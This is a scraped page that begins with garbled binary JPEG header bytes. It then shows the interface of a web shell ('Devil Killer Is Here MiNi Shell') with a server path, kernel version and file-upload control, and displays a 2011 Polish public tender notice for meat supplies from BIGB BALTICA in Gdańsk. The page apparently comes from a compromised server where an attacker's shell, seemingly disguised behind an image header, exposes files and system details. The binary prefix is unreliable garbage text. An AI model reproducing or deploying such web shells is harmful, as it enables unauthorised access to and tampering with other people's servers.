JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110530/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110530/134082-N-2011.html

<p class="kh_header"><b>Gdańsk: Dostawy mięsa i art.mięsnych</b><br>
<b>Numer ogłoszenia: 134082 - 2011; data zamieszczenia: 30.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bałtycka Instytucja Gospodarki Budżetowej BALTICA , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 58 3231102, faks 58 3231101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bigb-baltica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytutacja Gospodarki Budżetowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy mięsa i art.mięsnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)  Kiełbasa paryska  (średnio rozdrobniona) typu Sokołów ,- 500 kg (ilość szacunkowa), nomenklatura CPV:  15131130-5,
2)Kiełbasa parówkowa (drobno rozdrobniona) - 300 kg (ilość szacunkowa). Nomenklatura CPV: 15131130-5,
                  3) Kiełbasa zwyczajna z dziczyzną (średnio rozdrobniona) typu Sokołów - 600 kg (ilość szacunkowa),  
                    nomenklatura     CPV:15131130-5,      
4)Kiełbasa zwyczajna (średnio rozdrobniona) - 500 kg (ilość szacunkowa), nomenklatura CPV: 15131130-5, 
5)Kiełbasa studencka (średnio rozdrobniona) - 300 kg (ilość szacunkowa), nomenklatura CPV: 15131130-5, 
6)Kiełbasa podwawelska extra (średnio rozdrobniona) typu Sokołów - 700 kg (ilość szacunkowa), nomenklatura CPV: 15131130-5,
7)Kabanosy drobiowe parzone podsuszane,długość batonów około 25 cm (średnio rozdrobnione) - 300 kg (ilość szacunkowa), nomenklatura CPV:15131130-5, 
8)Kabanosy wieprzowe,parzone podsuszane,długość batonów około 25 cm (średnio rozdrobnione) - 300 kg (ilość szacunkowa), nomenklatura CPV:15131130-5,
9)Kiełbasa swojska pieczona (średnio rozdrobniona) - 600 kg (ilość szacunkowa), nomenklatura CPV:15131130-5,
10)Kiełbasa polska wędzona(średnio rozdrobniona) - 620 kg (ilość szacunkowa), nomenklatura CPV:15131130-5, 
11)Kiełbasa żywiecka czysto wieprzowa ,wędzona ,parzona, w opakowaniach  hermetycznie zamykanych od 0,4-0,6 kg  (średnio- rozdrobniona) -400 kg (ilość szacunkowa), nomenklatura CPV:15131130-5, 
12)Kaszanka pakowana w opakowaniach od 1,00-1,5 kg (drobno rozdrobnione) - 200 kg (ilość szacunkowa), nomenklatura CPV:15131134-3,
13)Parówki hermetycznie pakowane w opakowaniach od 200-250 g- 1000 szt (ilość szacunkowa), nomenklatura CPV: 15131130-5, 
14)Boczek wędzony pieczony chłopski hermetycznie zamknięty 500 kg (ilość szacunkowa), nomenklatura CPV:15131200-7
15)Udko z kurczaka wędzone hermetycznie zamknięte 500 kg (ilość szacunkowa), nomenklatura CPV:15131200-7
16)Golonka pieczona hermetycznie zamknięta - 600 kg (ilość szacunkowa), nomenklatura CPV:15131400-9 
17)Golonka wieprzowa świeża od 1,20-1,30 kg - 300 kg (ilość szacunkowa), nomenklatura CPV:15131400-9
18)Boczek świeży -luz 300 kg (ilość szacunkowa), nomenklatura CPV:15131130-5
19)Mięso wołowe extra b/k kl.I -luz 300 kg (ilość szacunkowa), nomenklatura CPV:15111000-9
20)Mięso gulaszowe wołowe  kl.II -luz 100 kg (ilość szacunkowa), nomenklatura CPV:15111190-7
21)Filet z indyka świeży luz -100 kg (ilość szacunkowa), nomenklatura CPV:15112220-4
22)Żołądki drobiowe świeże luz 100 kg (ilość szacunkowa), nomenklatura CPV:15112300-1
23)Kiełbasa biała parzona gramatura 1-1,2 luz ,kiełbasa średnio rozdrobniona ,parzona .I -luz 300 kg (ilość szacunkowa), nomenklatura  CPV:15131130-5
24)Kiełbasa biała parzona pakowana hermetycznie od 0,4-0,6 kg ,kiełbasa średnio rozdrobniona ,parzona .I -luz 300 kg (ilość szacunkowa), nomenklatura  CPV:15131130-5
25)Szynka wieprzowa parzona o gramaturze od 1,5-2 kg- luz 100 kg (ilość szacunkowa), nomenklatura CPV:15131130-5
26)Kaszanka blok 1,2-1,4 kg  luz 100 kg (ilość szacunkowa), nomenklatura  CPV:15131134-3
27))Kiełbasa śląska ,czysto wieprzowa w osłonce naturalnej,wędzona i parzona  w opakowaniach vac. 0,3-0,5 kg -średnio rozdrobniona-300 kg (ilość szacunkowa) CPV:15131130-5, 
28)Boczek wędzony bez żeberek - 200 kg (ilość szacunkowa), nomenklatura CPV:15131200-7,
                  29)  Schab b/k - 400 kg (ilość szacunkowa), nomenklatura CPV:15113000-3,
30) Wątroba drobiowa- 600 kg (ilość szacunkowa), nomenklatura CPV:15114000-0,  
                  31)Udka z kurczaka, świeże  - 400 kg (ilość szacunkowa), nomenklatura        CPV:15131500-0,  
                  32)Kości schabowe ,świeże    - 400 kg (ilość szacunkowa), nomenklatura        CPV:15113000-3,  
33)Karkówka bez kości - 300 kg (ilość szacunkowa), nomenklatura CPV:15113000-0,
34)Łopatka  - 300 kg (ilość szacunkowa), nomenklatura CPV:15113000, 
35) Pierś z kurczaka z kością -400 kg (ilość szacunkowa), nomenklatura CPV:15131500-0, 
36) Kurczak świeży - 300 kg (ilość szacunkowa), nomenklatura CPV:15112000 
37) Skrzydła drobiowe świeże - 200 kg (ilość szacunkowa), nomenklatura CPV: 15131500-0, 
38)Flaki wieprzowe lub wołowo-wieprzowe w pomidorach w opakowaniach foliowych od 0,8-1 kg -300 kg (ilość szacunkowa),nomenklatura CPV:15131400-9
39)Flaki wieprzowe krojone obgotowane  -300 kg (ilość szacunkowa), nomenklatura CPV:15131640-3
40)Mięso mielone (wieprzowo-wołowe)  600 kg (ilość szacunkowa), nomenklatura CPV:15113000-3 
41)Żeberka świeże -100 kg (ilość szacunkowa)-CPV:15113000-0
42)Salami w obsypce  Teksas plastry od 100-150 g ,pakowane hermetycznie-1000 szt- (ilość szacunkowa)-CPV: 15131230-6
43)Boczek plastry  od 100-150 g ,pakowany hermetycznie-1000 szt- (ilość szacunkowa)-CPV: CPV:15131130-5, 
44)Polędwica spocka plastry od 100-150 g ,pakowana hermetycznie-1000 szt- (ilość szacunkowa)-CPV: CPV:15131130-5, 
45)Baleron gotowany plastry  od 100-150 g ,pakowany hermetycznie-1000 szt- (ilość szacunkowa)-CPV: CPV:15131130-5, 
46)Salami plastry  od 100-150 g ,pakowane hermetycznie-1000 szt- (ilość szacunkowa)-CPV: 15131230-6
47)Szynka gotowana plastry od 100-150 g ,pakowana hermetycznie-1000 szt- (ilość szacunkowa)-CPV: CPV:15131130-5, 
48)Karczek małopolski  od 120-150 g ,pakowana hermetycznie-600 szt- (ilość szacunkowa)-CPV: CPV:15131130-5, 
49)Smalczyk wiejski  od120-150 gpakowana hermetycznie-typu Sokołów 600 szt- (ilość szacunkowa)-CPV: CPV:15131130-5, 
50)Smalczyk wiejski ze skwarkami od120-150g pakowana hermetycznie-typu Sokołów 600 szt- (ilość szacunkowa)-CPV: CPV:15131130-5, 
51)Szynka delikatesowa od 120 -150 gpakowana hermetycznie-typu Sokołów 600 szt- (ilość szacunkowa)-CPV: CPV:15131130-5, 
52)Gulasz od 120 -150 g pakowana hermetycznie-500 szt- (ilość szacunkowa)-CPV: CPV:15131130-5, 
                  53)Pasztecik różne rodzaje od 120-150 gpakowana hermetycznie,typu Sokołów -1000 szt- (ilośćszacunkowa)
                      CPV:15131130-5,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.12.00-7, 15.13.11.34-3, 15.13.14.00-9, 15.11.30.00-0, 15.13.12.30-6, 15.11.14.00-0, 15.11.10.00-9, 15.11.11.90-7, 15.11.22.00-4, 15.11.23.00-1, 15.13.16.40-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium przez wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia,tj.: 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia lub nie spełnia poszczególne warunki. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, tj.: podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia lub nie spełnia poszczególne warunki. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, tj.: podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia lub nie spełnia poszczególne warunki. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia,  tj.: podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W celu wykazania spełniania przez wykonawców warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, tj. warunków określonych w siwz w rozdziale VIII. pkt 1., których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu  wykonawca składa do oferty następujące dokumenty:
1)	podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu 
2.	W celu wykazania braku podstaw do wykluczenia wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 1 ustawy Pzp, tj. warunków określonych wsiwz w rozdziale VIII. pkt 2., których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w  siwz - rozdział VIII. pkt 3., wykonawca składa do oferty następujące dokumenty:
1)	podpisane oświadczenie o braku podstaw do wykluczenia (załącznik nr 3 do siwz);
2)	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp (załącznik nr 3 do siwz).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bigb-baltica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> BIGB BALTICA oddział  w Potulicach, ul. Aleja Parkowa 1, 89-120 Potulice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2011 godzina 12:00, miejsce: w biurze zamawiającego, przy ul. Aleja Parkowa 1  w Potulicach..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com